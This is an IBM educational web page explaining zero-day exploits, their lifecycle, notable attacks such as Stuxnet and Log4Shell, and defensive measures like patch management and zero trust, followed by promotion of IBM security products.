What is a zero-day exploit?
Subscribe to the IBM Newsletter Explore IBM Security Randori Recon
Isometric drawing showing different office personnel, all using IBM Security

A zero-day exploit is a cyberattack vector or technique that takes advantage of an unknown or unaddressed security flaw in computer software, hardware or firmware. ‘Zero day’ refers to the fact that the software or device vendor has zero days, or no time, to fix the flaw, because malicious actors can already use it to gain access to vulnerable systems.

The unknown or unaddressed vulnerability is referred to as a zero-day vulnerability or zero-day threat. A zero-day attack is when a malicious actor uses a zero-day exploit to plant malware, steal data, or otherwise cause damage to users, organizations or systems.

A similar but separate concept, zero day malware, is a virus or other form of malware for which signature is unknown or as yet unavailable, and therefore undetectable by many antivirus software solutions or other signature-based threat detection technologies.

IBM’s X-Force threat intelligence team has recorded 7,327 zero-day vulnerabilities since 1988. While this amounts to just three percent of all recorded security vulnerabilities, zero-day vulnerabilities—particularly those in widely-used operating systems or computing devices—are among the most severe security risks, because they leave huge numbers of users or entire organizations wide open to cybercrime until the vendor or the cybersecurity community identifies the problem and releases a solution.

The zero-day lifecycle

A zero-day vulnerability exists in a version of an operating system, app or device from the moment it’s released, but the software vendor or hardware manufacturer doesn’t know it. The vulnerability can lay undetected for days, months, or years until someone finds it.

In the best-case scenario, security researchers or software developers find the flaw before threat actors do. Sometimes, however, hackers get to the vulnerability first.

Regardless of who discovers the flaw, it often becomes public knowledge soon after. Vendors and security professionals typically tell customers so they can take precautions. Hackers may circulate the threat among themselves, and researchers may learn about it from watching cybercriminal activity. Some vendors may keep a vulnerability secret until they’ve developed a software update or other fix, but this can be a gamble—if hackers find the flaw before vendors patch it, organizations can be caught off guard.

Knowledge of any new zero-day flaw kicks off a race between security professionals working on a fix, and hackers developing a zero-day exploit that leverages the vulnerability to break into a system. Once hackers develop a workable zero-day exploit, they use it to launch a cyberattack.

Hackers can often develop exploits faster than security teams can develop patches. By one estimate (link resides outside ibm.com), exploits are usually available within 14 days of a vulnerability being disclosed. However, once zero-day attacks start, patches often follow in just a few days. That’s because vendors can use information from the attacks to pinpoint the flaw they need to fix. So, while zero-day vulnerabilities may be dangerous, hackers can’t typically exploit them for long. 

Examples of zero-day attacks

Stuxnet was a sophisticated computer worm that exploited four different zero-day software vulnerabilities in Microsoft Windows operating systems. In 2010, Stuxnet was used in a series of attacks on nuclear facilities in Iran. Once the worm had breached a nuclear plant’s computer systems, it sent malicious commands to the centrifuges used to enrich uranium. These commands caused the centrifuges to spin so fast that they broke down. In total, Stuxnet damaged 1,000 centrifuges.

Researchers believe the US and Israeli governments worked together to build Stuxnet, but this has not been confirmed.


Log4Shell was a zero-day vulnerability in Log4J, an open-source Java library used for logging error messages. Hackers could use the Log4Shell flaw to remotely control almost any device running Java apps. Because Log4J is used in popular programs like Apple iCloud and Minecraft, hundreds of millions of devices were at risk. MITRE’s Common Vulnerabilities and Exposures (CVE) database gave Log4Shell the highest possible risk score, a 10 out of 10. 

The Log4Shell flaw was present since 2013, but hackers didn’t start exploiting it until 2021. The vulnerability was patched shortly after discovery, but security researchers detected more than 100 Log4Shell attacks per minute at the peak. (link resides outside ibm.com).

2022 Chrome attacks

In early 2022, North Korean hackers exploited a zero-day remote code execution vulnerability in Google Chrome web browsers. The hackers used phishing emails to send victims to spoofed sites, which used the Chrome vulnerability to install spyware and remote access malware on victims’ machines. The vulnerability was patched after it came to light, but the hackers covered their tracks well, and researchers don’t know exactly what data was stolen. 

Why threat actors seek zero-day vulnerabilities

Zero-day attacks are some of the most difficult cyberthreats to combat. Hackers can exploit zero-day vulnerabilities before their targets even know about them, allowing threat actors to sneak into networks undetected.

Even if the vulnerability is public knowledge, it may be a while before software providers can release a patch, leaving organizations exposed in the meantime. 

In recent years, hackers have exploited zero-day vulnerabilities more frequently. A 2022 Mandiant report found that more zero-day vulnerabilities were exploited in 2021 alone than in all of 2018-2020 combined (link resides outside ibm.com).

The rise in zero-day attacks is likely tied to the fact that company networks are growing more complex. Today, organizations rely on a mix of cloud and on-premises apps, company-owned and employee-owned devices, and Internet of Things (IoT) and operational technology (OT) devices. All of these expand the size of an organization’s attack surface, and zero-day vulnerabilities could be lurking in any of them.

Because zero-day flaws offer such valuable opportunities to hackers, cybercriminals now trade zero-day vulnerabilities and zero-day exploits on the black market for lavish sums. For example, in 2020, hackers were selling Zoom zero-days for as much as USD 500,000 (link resides outside ibm.com). 

Nation-state actors are also known to seek out zero-day flaws. Many choose not disclose the zero-days they find, preferring instead to craft their own secret zero-day exploits for use against adversaries. Many vendors and security researchers have criticized this practice, arguing it puts unwitting organizations at risk. 

Preventing zero-day exploits and attacks

Security teams are often at a disadvantage with zero-day vulnerabilities. Because these flaws are unknown and unpatched, organizations can’t account for them in cybersecurity risk management or vulnerability mitigation efforts. 

However, there are steps companies can take to uncover more vulnerabilities and lessen the impact of zero-day attacks.

Patch management: Vendors rush to put out security patches as soon as they learn about zero-days, but many organizations neglect to apply these patches quickly. A formal patch management program can help security teams stay on top of these critical patches.

Vulnerability management: In-depth vulnerability assessments and penetration tests can help companies find zero-day vulnerabilities in their systems before hackers do. 

Attack surface management (ASM): ASM tools allow security teams to identify all assets in their networks and examine them for vulnerabilities. ASM tools assess the network from a hacker’s perspective, focusing on how threat actors are likely to exploit assets to gain access. Because ASM tools help organizations see their networks through an attacker’s eyes, they can help uncover zero-day vulnerabilities. 

Threat intelligence feeds: Security researchers are often among the first to flag zero-day vulnerabilities. Organizations that stay updated on external threat intelligence may hear about new zero-day vulnerabilities sooner.

Anomaly-based detection methods: Zero-day malware can evade signature-based detection methods, but tools that use machine learning to spot suspicious activity in real-time can often catch zero-day attacks. Common anomaly-based detection solutions include user and entity behavior analytics (UEBA), extended detection and response (XDR) platforms, endpoint detection and response (EDR) tools, and some intrusion detection and intrusion prevention systems.

Zero trust architecture: If a hacker exploits a zero-day vulnerability to break into a network, zero trust architecture can limit the damage. Zero trust uses continuous authentication and least privilege access to prevent lateral movement and block malicious actors from reaching sensitive resources. 

Related solutions
IBM Security® Randori Recon

Quickly improve your organization's cyberresilence. Manage the expansion of your digital footprint, uncover shadow IT, and get on target with correlated, factual findings that are based on adversarial temptation.

Explore Randori Recon

Threat detection and response

81% of SOC professionals say they are slowed down by manual investigations.1 Speed alert investigations with IBM Security QRadar® Suite, a modernized selection of security technologies featuring a unified analyst experience built with AI and automations.

Explore threat detection and response

IBM X-Force Red vulnerability management services

Adopt a vulnerability management program that identifies, prioritizes and manages the remediation of flaws, strengthens your resistence to attacks, shortens remediation times and helps maintain regulatory compliance.

Explore vulnerability management services
Resources The Ultimate Guide to Zero-Day Exploits

Learn all you need to know about zero-day exploits and the crucial role they play in security. Prepared by Randori, an IBM company.

What is a cyberattack?

Cyberattacks are attempts to steal, expose, alter, disable, or destroy another's assets through unauthorized access to computer systems.

What is vulnerability management?

Vulnerability management is the continuous discovery and resolution of security flaws in an organization’s IT infrastructure and software.

Take the next step

Widespread hybrid cloud adoption and permanent remote workforce support have made it impossible to manage the enterprise attack surface. IBM Security Randori Recon uses a continuous, accurate discovery process to uncover shadow IT. Randori Recon keeps you on target with fewer false positives, and improves your overall resiliency through streamlined workflows and integrations with your existing security ecosystem.


Explore Randori Recon Request a Randori Recon demo

1 Global Security Operations Center Study Results (PDF, 1.9 MB), conducted by Morning Consult and sponsored by IBM, March 2023